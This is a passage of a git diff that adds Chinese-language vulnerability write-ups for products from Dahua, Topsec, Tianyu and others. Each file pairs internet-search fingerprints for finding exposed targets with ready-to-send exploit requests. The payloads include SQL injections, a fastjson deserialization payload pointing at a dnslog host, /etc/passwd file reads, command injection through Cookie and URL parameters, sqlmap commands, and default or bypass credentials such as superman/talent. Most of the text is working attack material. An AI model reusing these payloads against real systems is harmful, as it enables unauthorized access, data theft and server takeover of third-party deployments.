+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+username=1')and+updatexml(1,concat(0x7e,user(),0x7e),1)--+&password=
+```
+
+![image-20241017143354676](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171433754.png)
\ No newline at end of file
diff --git a/大华智能物联综合管理平台(ICC)info存在信息泄露.md b/大华智能物联综合管理平台(ICC)info存在信息泄露.md
new file mode 100644
index 0000000..c4e4406
--- /dev/null
+++ b/大华智能物联综合管理平台(ICC)info存在信息泄露.md
@@ -0,0 +1,31 @@
+# 大华智能物联综合管理平台(ICC)info存在信息泄露
+
+# 一、漏洞简介
+浙江大华技术股份有限公司，是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商，大华智能物联综合管理平台(ICC)info存在信息泄露。
+
+# 二、影响版本
++ 大华智能物联综合管理平台(ICC)
+
+# 三、资产测绘
++ hunter`web.body="*客户端会小于800*"`
++ 特征
+
+![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/8KAhtAW0SvGpY8Rt/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-364557.png)
+
+# 四、漏洞复现
+```plain
+GET /evo-apigw/evo-visitor/1.0.0/card/visitor/user/info?userId=4&pageNum=1&pageSize=1000 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Upgrade-Insecure-Requests: 1
+```
+
+![1716001623502-df87343a-998c-4522-b992-0490c28a22c5.png](./img/8KAhtAW0SvGpY8Rt/1716001623502-df87343a-998c-4522-b992-0490c28a22c5-537803.png)
+
+
+
+> 更新: 2024-05-18 12:31:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qiwf6qcxedf9t1ir>
\ No newline at end of file
diff --git a/大华智能物联综合管理平台(ICC)page存在信息泄露.md b/大华智能物联综合管理平台(ICC)page存在信息泄露.md
new file mode 100644
index 0000000..85dc8f0
--- /dev/null
+++ b/大华智能物联综合管理平台(ICC)page存在信息泄露.md
@@ -0,0 +1,25 @@
+# 大华智能物联综合管理平台(ICC)page存在信息泄露
+
+# 一、漏洞简介
+浙江大华技术股份有限公司，是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商，大华智能物联综合管理平台(ICC)page存在信息泄露。
+
+# 二、影响版本
++ 大华智能物联综合管理平台(ICC)
+
+# 三、资产测绘
++ hunter`web.body="*客户端会小于800*"`
++ 特征
+
+![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/yk3Nv7TC8vo6v7Lu/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-151161.png)
+
+# 四、漏洞复现
+```plain
+/evo-apigw/evo-face/personInfo/page?pageSize=10
+```
+
+![1700140396421-a6bee011-dc48-4d41-876b-a7f0f649c78e.png](./img/yk3Nv7TC8vo6v7Lu/1700140396421-a6bee011-dc48-4d41-876b-a7f0f649c78e-456265.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rnq80hcwo0wrk26s>
\ No newline at end of file
diff --git a/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md b/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md
new file mode 100644
index 0000000..2a382b4
--- /dev/null
+++ b/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md
@@ -0,0 +1,41 @@
+# 大华智能物联综合管理平台(ICC)random fastjson远程命令执行
+
+# 一、漏洞简介
+浙江大华技术股份有限公司，是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商，大华智能物联综合管理平台random 存在fastjson远程命令执行，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 大华智能物联综合管理平台(ICC)
+
+# 三、资产测绘
++ hunter`web.body="*客户端会小于800*"`
++ 特征
+
+![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/BtmXKCbbYKEhwLpy/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-210040.png)
+
+# 四、漏洞复现
+poc：前往dnslog获取一个地址替换下列poc中的地址发起请求
+
+```plain
+POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)
+Connection: close
+Content-Length: 372
+Content-Type: application/json;charset=utf-8
+Accept-Encoding: gzip, deflate
+
+{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}}""},"b":{{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}:"x"},"c":{{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}:0,"d":Set[{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}],"e":Set[{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"},}
+```
+
+![1700141693694-e294200a-f4f8-40f7-a26b-f050d75799ec.png](./img/BtmXKCbbYKEhwLpy/1700141693694-e294200a-f4f8-40f7-a26b-f050d75799ec-068880.png)
+
+dns收到响应
+
+![1700141711840-a6f53e9e-6c4e-4e80-aad4-1919aa709b30.png](./img/BtmXKCbbYKEhwLpy/1700141711840-a6f53e9e-6c4e-4e80-aad4-1919aa709b30-104216.png)
+
+
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggsmd59d5g6pzrnd>
\ No newline at end of file
diff --git a/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md b/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8f75e27
--- /dev/null
+++ b/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 大华智能物联综合管理平台(ICC)存在任意文件读取漏洞
+
+# 一、漏洞简介
+浙江大华技术股份有限公司，是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商，大华智能物联综合管理平台(ICC)存在任意文件读取漏洞。
+
+# 二、影响版本
++ 大华智能物联综合管理平台(ICC)
+
+# 三、资产测绘
++ hunter`web.body="*客户端会小于800*"`
++ 特征
+
+![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/baFCS1-k5qnJaLlX/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-063468.png)
+
+# 四、漏洞复现
+```plain
+/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
+```
+
+![1698767562703-2a52b16a-1317-44d7-8bb9-531c2f8dfe2f.png](./img/baFCS1-k5qnJaLlX/1698767562703-2a52b16a-1317-44d7-8bb9-531c2f8dfe2f-099139.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dh0fr3iwsw1u74kk>
\ No newline at end of file
diff --git a/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md b/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md
new file mode 100644
index 0000000..605ea00
--- /dev/null
+++ b/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md
@@ -0,0 +1,33 @@
+# 大华智能物联综合管理平台(ICC)存在逻辑漏洞
+
+# 一、漏洞简介
+浙江大华技术股份有限公司，是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商，大华智能物联综合管理平台(ICC)存在逻辑漏洞，可登陆应用后台。
+
+# 二、影响版本
++ 大华智能物联综合管理平台(ICC)
+
+# 三、资产测绘
++ hunter`web.body="*客户端会小于800*"`
++ 特征
+
+![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/7yaQI2AUPtTcYV-V/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-409869.png)
+
+# 四、漏洞复现
+api信息泄露
+
+```java
+/api
+```
+
+![1698336313178-f8761ff1-b3af-4327-bf1a-a7b0d9a06aa2.png](./img/7yaQI2AUPtTcYV-V/1698336313178-f8761ff1-b3af-4327-bf1a-a7b0d9a06aa2-537818.png)
+
+任意密码登陆
+
+<font style="color:rgb(51,51,51);">直接输入账户</font>`<font style="color:rgb(51,51,51);">justForTest</font>`<font style="color:rgb(51,51,51);">，密码任意输入,直接进入后台。界面如下</font>
+
+![1698336392454-6bf25ac0-92a2-47c5-99a4-5dfaf5c4cd87.png](./img/7yaQI2AUPtTcYV-V/1698336392454-6bf25ac0-92a2-47c5-99a4-5dfaf5c4cd87-832347.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gos4ilum1dcbrzp3>
\ No newline at end of file
diff --git a/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md b/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..a004146
--- /dev/null
+++ b/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 大商创多用户商城wholesale_flow.php存在SQL注入漏洞
+
+大商创多用户商城系统 wholesale_flow.php接口处存在SQL注入漏洞，未经身份验证攻击者可通过输入恶意 SQL 代码，突破系统原本设定的访问规则，未经授权访问、修改或删除数据库中的各类敏感信息，包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。
+
+## fofa
+
+```
+body="dsc-choie"
+```
+
+## poc
+
+```javascript
+POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+rec_ids[]=extractvalue(1,concat(0x7e,version()))
+```
+
+![image-20241019201036088](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251431588.png)
+
+
+
diff --git a/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md b/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..26476a8
--- /dev/null
+++ b/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞
+
+大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞，未经身份验证攻击者可通过输入恶意 SQL 代码，突破系统原本设定的访问规则，未经授权访问、修改或删除数据库中的各类敏感信息，包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。
+
+## fofa
+
+```javascript
+body="dsc-choie"
+```
+
+## poc
+
+```javascript
+GETT /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=extractvalue(1,concat(0x7e,md5(123)))&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241019194229784](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251434207.png)
diff --git a/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md b/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..86e7a1f
--- /dev/null
+++ b/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 天喻软件数据安全平台 Setmng.ashx 存在SQL注入漏洞
+
+# 一、漏洞简介
+武汉天喻软件有限公司是依托国家企业信息化应用支撑软件工程技术研究中心成立的专业数字化设计软件提供商，武汉天喻软件有限公司天喻软件数据安全平台 Setmng.ashx 存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 天喻软件数据安全平台
+
+# 三、资产测绘
++ hunter`web.body="数据安全"&&web.body="天喻"`
++ 特征
+
+![1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b.png](./img/NArvknPrBwITK6HP/1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b-609325.png)
+
+# 四、漏洞复现
+```plain
+GET /p_handler/Setmng.ashx?operatetype=getparamvalue&paramname=1%27%2b(SELECT%20CHAR(90)%2bCHAR(103)%2bCHAR(103)%2bCHAR(71)%20WHERE%205505=5505%20AND%206796%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(118)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(6796=6796)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2bCHAR(113)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(113))))%2b%27 HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=ubyt433ue142lpuddbnjsybm
+Upgrade-Insecure-Requests: 1
+```
+
+![1702279064168-29353ede-f5fc-436b-b54d-d05437eabfcd.png](./img/NArvknPrBwITK6HP/1702279064168-29353ede-f5fc-436b-b54d-d05437eabfcd-986150.png)
+
+sqlmap
+
+```plain
+GET /p_handler/Setmng.ashx?operatetype=getparamvalue&paramname=1 HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=ubyt433ue142lpuddbnjsybm
+Upgrade-Insecure-Requests: 1
+```
+
+![1702279315862-2a9e2004-44ef-4e0c-a7f2-28f741e9a1a1.png](./img/NArvknPrBwITK6HP/1702279315862-2a9e2004-44ef-4e0c-a7f2-28f741e9a1a1-694535.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eapt0rguixag6qgu>
\ No newline at end of file
diff --git a/天喻软件数据安全平台存在目录遍历漏洞.md b/天喻软件数据安全平台存在目录遍历漏洞.md
new file mode 100644
index 0000000..091ee44
--- /dev/null
+++ b/天喻软件数据安全平台存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# 天喻软件数据安全平台存在目录遍历漏洞
+
+# 一、漏洞简介
+武汉天喻软件有限公司是依托国家企业信息化应用支撑软件工程技术研究中心成立的专业数字化设计软件提供商，武汉天喻软件有限公司天喻软件数据安全平台存在目录遍历漏洞。
+
+# 二、影响版本
++ 天喻软件数据安全平台
+
+# 三、资产测绘
++ hunter`web.body="数据安全"&&web.body="天喻"`
++ 特征
+
+![1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b.png](./img/oHYPldLmxAltIV5C/1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b-361026.png)
+
+# 四、漏洞复现
+```plain
+/handler/
+```
+
+![1702278947680-75ca45e8-f846-49dd-9943-d5ce81608292.png](./img/oHYPldLmxAltIV5C/1702278947680-75ca45e8-f846-49dd-9943-d5ce81608292-882605.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/riz4bqs00cgq4ybr>
\ No newline at end of file
diff --git a/天智云制造管理平台存在SQL注入漏洞.md b/天智云制造管理平台存在SQL注入漏洞.md
new file mode 100644
index 0000000..98bf6fb
--- /dev/null
+++ b/天智云制造管理平台存在SQL注入漏洞.md
@@ -0,0 +1,42 @@
+# 天智云制造管理平台存在SQL注入漏洞
+
+# 一、漏洞简介
+天智(苏州)智能系统有限公司天智云制造管理平台是一款专注于中小企业智能化生产管理的SaaS软件。该平台通过一站式服务串联销售、采购、生产、质量和仓库等部门，实现生产全过程的数字化管理。它具备生产管理、订单管理、质量追溯、仓库管理等多项功能，并通过移动化、可配置的方式，满足企业个性化需求。天智云制造管理平台致力于提高生产效率、降低生产成本、提升产品质量，帮助中小企业实现数智化转型。天智云制造管理平台是一款专注于中小企业智能化生产管理的SaaS软件。该系统 Usermanager.ashx 存在sql注入漏洞，攻击者可获取数据库敏感信息。
+
+# 二、影响版本
++ 天智云制造管理平台
+
+![1717521987496-0cdc1e1a-6218-4a69-8710-5d4c3ab7bfcf.png](./img/cqxqW9CfhZvLaZfD/1717521987496-0cdc1e1a-6218-4a69-8710-5d4c3ab7bfcf-233161.png)
+
+# 三、资产测绘
+```plain
+body="Ashx/Usermanager.ashx"
+```
+
+# 四、漏洞复现
+```rust
+POST /Ashx/Usermanager.ashx HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+
+type=LOGIN&username=1') AND 1566=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(90)||CHR(98)||CHR(107),5) AND ('DgMy'='DgMy&pwd=123&vendor=
+```
+
+![1717522389390-1984a2fc-6c71-4bd0-9e4f-f2ba802d3ba5.png](./img/cqxqW9CfhZvLaZfD/1717522389390-1984a2fc-6c71-4bd0-9e4f-f2ba802d3ba5-947512.png)
+
+```rust
+POST /Ashx/Usermanager.ashx HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+
+type=LOGIN&username=1&pwd=123&vendor=
+```
+
+![1717522241787-c3080d0a-5cf1-4e32-ae54-72fe6ce28e3b.png](./img/cqxqW9CfhZvLaZfD/1717522241787-c3080d0a-5cf1-4e32-ae54-72fe6ce28e3b-241140.png)
+
+
+
+> 更新: 2024-06-11 10:35:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/suc76y4muoeqbtkp>
\ No newline at end of file
diff --git a/天维尔消防智能指挥平台API接口页面sql注入.md b/天维尔消防智能指挥平台API接口页面sql注入.md
new file mode 100644
index 0000000..b2b06cf
--- /dev/null
+++ b/天维尔消防智能指挥平台API接口页面sql注入.md
@@ -0,0 +1,42 @@
+# 天维尔消防智能指挥平台API接口页面sql注入
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">天维尔消防智能指挥平台是一个采用先进的信息技术和通信技术的系统，能够快速准确地获取和处理突发事件的信息，实现对灾害现场的实时监控和指挥调度，有效提升应急救援工作的能力和水平。天为消防智能指挥平台存在一个漏洞，影响组件API接口中/mfsNotice/page文件的未知代码。通过操纵参数gsdwid可以导致SQL注入</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 天维尔消防智能指挥平台
+
+# 三、资产测绘
++ fofa`body="1997-2020 天维尔信息科技股份有限公司"`
++ 特征![1713248867816-c5d8010e-070f-4e92-8138-7526aa05d8fc.png](./img/bLXwGvRixXSMcwTn/1713248867816-c5d8010e-070f-4e92-8138-7526aa05d8fc-610098.png)
+
+# 四、漏洞复现
+```java
+POST /twms-service-mfs/mfsNotice/page HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/json
+Content-Length: 103
+
+{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930')AND 5803=(SELECT 5803 FROM PG_SLEEP(3)) AND ('oJoi'='oJoi"},"hgubmt748n4":"="}
+```
+
+![1713248959286-64b5a565-ee51-45ab-8b52-05b56045b8a8.png](./img/bLXwGvRixXSMcwTn/1713248959286-64b5a565-ee51-45ab-8b52-05b56045b8a8-568512.png)
+
+SQLMAP命令
+
+```java
+python3 sqlmap.py -r payload.txt --technique=T --time-sec 3  --dbs -v 3 --level 5 --random-agent
+```
+
+![1713251141032-131b90b2-330d-44bc-9445-51c55778e1e8.png](./img/bLXwGvRixXSMcwTn/1713251141032-131b90b2-330d-44bc-9445-51c55778e1e8-306551.png)
+
+
+
+> 更新: 2024-04-20 22:02:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ch6s7681pfvp2rws>
\ No newline at end of file
diff --git a/天融信TOPSECCookie远程命令执行漏洞.md b/天融信TOPSECCookie远程命令执行漏洞.md
new file mode 100644
index 0000000..8f903a6
--- /dev/null
+++ b/天融信TOPSECCookie远程命令执行漏洞.md
@@ -0,0 +1,40 @@
+# 天融信TOPSEC Cookie 远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(77, 77, 77);">天融信TopSec安全管理系统 Cookie字段存在远程命令执行漏洞，通过该漏洞，攻击者可通过构造恶意字符串，执行任意系统命令，从而拿下服务器权限。</font>
+
+# <font style="color:rgb(77, 77, 77);">二、影响版本</font>
++ <font style="color:rgb(77, 77, 77);">天融信TopSec安全管理系统</font>
+
+# <font style="color:rgb(77, 77, 77);">三、资产测绘</font>
++ hunter`web.body="/cgi/maincgi.cgi?Url=VerifyCode"`
++ 特征
+
+![1704936146537-13a86149-a1db-456a-823d-3aa12caf6762.png](./img/AgIFV74hdffAwtGZ/1704936146537-13a86149-a1db-456a-823d-3aa12caf6762-191707.png)
+
+# 四、漏洞复现
+```java
+GET /cgi/maincgi.cgi?Url=aa HTTP/1.1
+Host: 
+Cookie: session_id_443=1|echo `id`  > /www/htdocs/site/image/tt.txt;
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+```
+
+![1704936207084-191ac2c5-9555-4105-a03f-68bc8b2847a8.png](./img/AgIFV74hdffAwtGZ/1704936207084-191ac2c5-9555-4105-a03f-68bc8b2847a8-085309.png)
+
+获取命令执行结果
+
+```java
+GET /site/image/tt.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+```
+
+![1704936274463-eaacc85c-3862-4293-8deb-290be80ec4b8.png](./img/AgIFV74hdffAwtGZ/1704936274463-eaacc85c-3862-4293-8deb-290be80ec4b8-523088.png)
+
+[test_qrcode_b-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222234675-5ae23a8d-103c-4fab-bc8f-c12a5b7ca4fe.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ff91c9eyvw89wgfb>
\ No newline at end of file
diff --git a/天融信上网行为管理系统存在默认账号密码.md b/天融信上网行为管理系统存在默认账号密码.md
new file mode 100644
index 0000000..453fe27
--- /dev/null
+++ b/天融信上网行为管理系统存在默认账号密码.md
@@ -0,0 +1,20 @@
+# 天融信上网行为管理系统存在默认账号密码
+
+# 一、漏洞简介
+天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验，为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在默认账号密码，攻击者可利用该漏洞获取应用系统管理员权限。
+
+# 二、影响版本
++ fofa`app="天融信-上网行为管理系统"`
++ 登录页面
+
+![1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png](./img/jE8FOC_pK3O28UB_/1693205859079-207fa54f-ee37-4331-9621-44209c2001e0-905793.png)
+
+# 四、漏洞复现
+天融信上网行为管理系统存在默认账号密码`superman/talent`
+
+![1694247824059-ff06d82f-487c-40e2-bb90-918a503bcd59.png](./img/jE8FOC_pK3O28UB_/1694247824059-ff06d82f-487c-40e2-bb90-918a503bcd59-569208.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tcqc7ss19wvg0gk0>
\ No newline at end of file
diff --git a/天融信上网行为管理远程命令执行漏洞.md b/天融信上网行为管理远程命令执行漏洞.md
new file mode 100644
index 0000000..54605ab
--- /dev/null
+++ b/天融信上网行为管理远程命令执行漏洞.md
@@ -0,0 +1,32 @@
+# 天融信上网行为管理远程命令执行漏洞
+
+# 一、漏洞简介
+天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验，为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权。
+
+# 二、影响版本
++ fofa`app="天融信-上网行为管理系统"`
++ 登录页面
+
+![1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png](./img/7241cfwepr_fRCyL/1693205859079-207fa54f-ee37-4331-9621-44209c2001e0-772323.png)
+
+# 四、漏洞复现
+1. 通过POC执行命令并将命令执行结果写入1.txt文件中
+
+```plain
+http://xx.xx.xx.xx/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20ls%20%3E%3E%20/var/www/html/1.txt%0A
+```
+
+![1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3.png](./img/7241cfwepr_fRCyL/1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3-832854.png)
+
+2. 访问1.txt获取命令执行结果
+
+```plain
+http://xx.xx.xx.xx/1.txt
+```
+
+![1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e.png](./img/7241cfwepr_fRCyL/1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e-775050.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/itebo7lea2zxwow8>
\ No newline at end of file
diff --git a/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md b/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md
new file mode 100644
index 0000000..efea465
--- /dev/null
+++ b/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md
@@ -0,0 +1,28 @@
+# 天融信运维安全审计系统synRequest存在远程命令执行漏洞
+天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成，系统以4A管理理念为基础、安全代理为核心，在运维管理领域持续创新，为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案，适用于政府、金融、能源、电信、交通、教育等行业。天融信运维安全审计系统synRequest存在远程命令执行漏洞
+
+## fofa
+```javascript
+header="iam" && server="Apache-Coyote/"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1726806457752-179c9efc-a981-49df-93a7-9c9d9b885f74.png)
+
+## poc
+```plain
+POST /iam/synRequest.do;.login.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-site
+Content-Length: 67
+
+method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1726806487958-36d070b5-0606-4163-865a-b86bb9d0fcd7.png)
+
diff --git a/天融信运维安全审计系统存在任意文件读取漏洞.md b/天融信运维安全审计系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..f216eb1
--- /dev/null
+++ b/天融信运维安全审计系统存在任意文件读取漏洞.md
@@ -0,0 +1,28 @@
+# 天融信运维安全审计系统存在任意文件读取漏洞
+
+天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成，系统以4A管理理念为基础、安全代理为核心，在运维管理领域持续创新，为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案，适用于政府、金融、能源、电信、交通、教育等行业。天融信运维安全审计系统download存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+header="iam" && server="Apache-Coyote/"
+```
+
+## poc
+
+```javascript
+POST /iam/download;.login.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
